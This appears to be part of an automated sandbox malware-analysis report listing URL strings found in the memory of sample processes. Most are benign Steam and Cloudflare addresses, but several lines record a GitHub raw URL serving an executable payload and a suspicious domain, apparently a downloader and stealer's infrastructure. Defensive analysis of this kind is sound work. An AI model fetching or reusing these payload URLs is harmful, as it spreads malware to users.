Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedc
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcD
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&amp
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&l=engl
Source: 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&l=
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=bpFp7zU77IKn&
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=n4_f9JKDa7wP&
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=0y-Qdz9keFm
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&
Source: powershell.exe, 0000000D.00000002.1672248672.0000000005F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.1672248672.0000000005F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.1672248672.0000000005F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com
Source: powershell.exe, 0000000D.00000002.1655620114.0000000005015000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: YYjRtxS70h.exe	String found in binary or memory: https://github.com/olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: powershell.exe, 00000005.00000002.1558683585.0000000006089000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1606744691.00000000061B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1672248672.0000000005F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
